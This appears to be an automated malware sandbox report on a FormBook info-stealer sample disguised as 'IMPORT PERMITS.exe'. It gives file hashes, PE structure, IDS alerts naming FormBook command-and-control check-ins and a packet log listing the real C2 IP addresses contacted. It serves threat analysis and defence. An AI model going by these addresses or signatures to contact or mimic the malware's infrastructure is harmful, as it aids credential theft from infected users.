                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:true
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                              C:\Users\user\AppData\Local\Temp\6276I39

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):114688
                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):7.927652102098847
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                              File name:IMPORT PERMITS.exe
                                                                                                                              File size:775'168 bytes
                                                                                                                              MD5:b648db78eac01c6c7311e34d232b4ed7
                                                                                                                              SHA1:3efe3363ea8f532301252ac23c0b0df116836e67
                                                                                                                              SHA256:1eef3c00ea6fe6b3e757e7ee213f2cf19a76cb290ceb108b5dc63fe7eb86012c
                                                                                                                              SHA512:ec3e6dbe7e9b16d46bc9619b320458d2c2103143d54b0650120e851dedfbbffbba5ed57711c68b88cdc10c80bd214b1bbe9e9beef364e1e8bdea1ba14d94fc9e
                                                                                                                              SSDEEP:12288:UoaDPw1Qk89TmyMWS9eL+u3Tk95RnDvzvvJP5VNj702GW1mytw1KRj3F4wOHaLI1:kLw9gTFMW/L+u3MnbtPZcW15tbRjCwZm
                                                                                                                              TLSH:08F4121073F89744E6BB6BF62AB411A157B7BD16793AD38C0D8010CE0EB3B914A64F27
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............@................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x4be6f2
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x8FE9D11E [Fri Jul 6 04:48:30 2046 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbe69e0x4f.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x61c.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xbc0780x70.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x20000xbc6f80xbc800d07bba9729cd7a0aaa9f4e251db9ece8False0.9470843003978779data7.935527441310873IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0xc00000x61c0x800a234f2f454627bae8fbd5123d3a74fbfFalse0.33740234375data3.457025003311642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0xc20000xc0x200b702a3de3a1b80630722f5de3039d8abFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_VERSION0xc00900x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.4251101321585903
                                                                                                                              RT_MANIFEST0xc042c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                              Network Behavior

                                                                                                                              Suricata IDS Alerts

                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-11-02T08:10:59.878096+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449389216.219.93.1780TCP
                                                                                                                              2024-11-02T08:11:15.071202+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449735TCP
                                                                                                                              2024-11-02T08:11:40.879537+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.465456TCP
                                                                                                                              2024-11-02T08:11:42.331245+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.465457TCP
                                                                                                                              2024-11-02T08:11:48.187130+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4654583.33.130.19080TCP
                                                                                                                              2024-11-02T08:11:48.187130+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4654583.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:03.991850+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.465495172.67.131.3280TCP
                                                                                                                              2024-11-02T08:12:06.533842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.465510172.67.131.3280TCP
                                                                                                                              2024-11-02T08:12:09.071921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.465522172.67.131.3280TCP
                                                                                                                              2024-11-02T08:12:11.647489+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449155172.67.131.3280TCP
                                                                                                                              2024-11-02T08:12:11.647489+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449155172.67.131.3280TCP
                                                                                                                              2024-11-02T08:12:19.003440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449191103.191.208.13780TCP
                                                                                                                              2024-11-02T08:12:21.549456+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449207103.191.208.13780TCP
                                                                                                                              2024-11-02T08:12:24.096413+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449221103.191.208.13780TCP
                                                                                                                              2024-11-02T08:12:27.377474+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449236103.191.208.13780TCP
                                                                                                                              2024-11-02T08:12:27.377474+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449236103.191.208.13780TCP
                                                                                                                              2024-11-02T08:12:41.641466+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4493203.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:45.069257+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4493333.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:47.612436+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4493433.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:50.205320+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4493523.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:50.205320+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4493523.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:56.018224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4493533.33.130.19080TCP
                                                                                                                              2024-11-02T08:12:58.570549+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4493543.33.130.19080TCP
                                                                                                                              2024-11-02T08:13:01.288609+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4493553.33.130.19080TCP
                                                                                                                              2024-11-02T08:13:03.761774+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4493563.33.130.19080TCP
                                                                                                                              2024-11-02T08:13:03.761774+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4493563.33.130.19080TCP
                                                                                                                              2024-11-02T08:13:10.087282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44935738.47.232.16080TCP
                                                                                                                              2024-11-02T08:13:12.971506+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44935838.47.232.16080TCP
                                                                                                                              2024-11-02T08:13:15.330687+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44935938.47.232.16080TCP
                                                                                                                              2024-11-02T08:13:17.596335+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44936038.47.232.16080TCP
                                                                                                                              2024-11-02T08:13:17.596335+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44936038.47.232.16080TCP
                                                                                                                              2024-11-02T08:13:24.458604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44936134.92.109.13180TCP
                                                                                                                              2024-11-02T08:13:26.971383+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44936234.92.109.13180TCP
                                                                                                                              2024-11-02T08:13:29.424467+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44936334.92.109.13180TCP
                                                                                                                              2024-11-02T08:13:32.065334+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44936434.92.109.13180TCP
                                                                                                                              2024-11-02T08:13:32.065334+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44936434.92.109.13180TCP
                                                                                                                              2024-11-02T08:13:37.859117+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449365162.0.211.14380TCP
                                                                                                                              2024-11-02T08:13:40.407355+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449366162.0.211.14380TCP
                                                                                                                              2024-11-02T08:13:43.042243+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449367162.0.211.14380TCP
                                                                                                                              2024-11-02T08:13:45.573385+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449368162.0.211.14380TCP
                                                                                                                              2024-11-02T08:13:45.573385+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449368162.0.211.14380TCP
                                                                                                                              2024-11-02T08:13:51.622380+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449369195.110.124.13380TCP
                                                                                                                              2024-11-02T08:13:54.215448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449370195.110.124.13380TCP
                                                                                                                              2024-11-02T08:13:56.693329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449371195.110.124.13380TCP
                                                                                                                              2024-11-02T08:13:59.268290+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449372195.110.124.13380TCP
                                                                                                                              2024-11-02T08:13:59.268290+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449372195.110.124.13380TCP
                                                                                                                              2024-11-02T08:14:05.362082+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449373185.68.16.9480TCP
                                                                                                                              2024-11-02T08:14:08.037680+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449374185.68.16.9480TCP
                                                                                                                              2024-11-02T08:14:10.552132+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449375185.68.16.9480TCP
                                                                                                                              2024-11-02T08:14:13.000112+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449376185.68.16.9480TCP
                                                                                                                              2024-11-02T08:14:13.000112+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449376185.68.16.9480TCP
                                                                                                                              2024-11-02T08:14:19.625515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449377163.44.176.1280TCP
                                                                                                                              2024-11-02T08:14:22.198624+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449378163.44.176.1280TCP
                                                                                                                              2024-11-02T08:14:24.717662+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449379163.44.176.1280TCP
                                                                                                                              2024-11-02T08:14:28.163661+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449380163.44.176.1280TCP
                                                                                                                              2024-11-02T08:14:28.163661+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449380163.44.176.1280TCP
                                                                                                                              2024-11-02T08:14:34.038547+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449381199.59.243.22780TCP
                                                                                                                              2024-11-02T08:14:36.590786+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449382199.59.243.22780TCP
                                                                                                                              2024-11-02T08:14:39.166080+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449383199.59.243.22780TCP
                                                                                                                              2024-11-02T08:14:41.739639+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449384199.59.243.22780TCP
                                                                                                                              2024-11-02T08:14:41.739639+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449384199.59.243.22780TCP
                                                                                                                              2024-11-02T08:14:48.893588+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449385103.233.82.5880TCP
                                                                                                                              2024-11-02T08:14:51.440454+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449386103.233.82.5880TCP
                                                                                                                              2024-11-02T08:14:53.987224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449387103.233.82.5880TCP
                                                                                                                              2024-11-02T08:14:56.690300+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449388103.233.82.5880TCP
                                                                                                                              2024-11-02T08:14:56.690300+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449388103.233.82.5880TCP

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 2, 2024 08:11:47.519301891 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:47.524187088 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:47.524255037 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:47.532429934 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:47.537276983 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:48.186441898 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:48.186991930 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:48.187129974 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:48.212764978 CET6545880192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:11:48.218523026 CET80654583.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.271856070 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.276737928 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.276806116 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.285598040 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.290532112 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.991750002 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.991781950 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.991849899 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:03.994746923 CET8065495172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.995356083 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:04.799344063 CET6549580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.817351103 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.822240114 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:05.822325945 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.831248999 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:05.836081028 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:06.533761978 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:06.533776045 CET8065510172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:06.533842087 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:07.346242905 CET6551080192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.364366055 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.369385958 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.369457006 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.378828049 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:08.383706093 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383774996 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383816957 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383826971 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.383879900 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.384052992 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.387695074 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.387706995 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:08.387716055 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:09.069901943 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:09.071850061 CET8065522172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:09.071921110 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:09.893146992 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.911550045 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.916398048 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:10.916465044 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.923604965 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.928561926 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.647187948 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.647202015 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.647489071 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:11.649509907 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.649555922 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:11.651519060 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:11.656291008 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:17.473648071 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:17.478507042 CET8049191103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:17.478593111 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:17.490432024 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:17.495345116 CET8049191103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:19.003439903 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:19.009012938 CET8049191103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:19.011269093 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.027942896 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.032938957 CET8049207103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:20.033221960 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.044430017 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.049231052 CET8049207103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:21.549455881 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:21.554833889 CET8049207103.191.208.137192.168.2.4
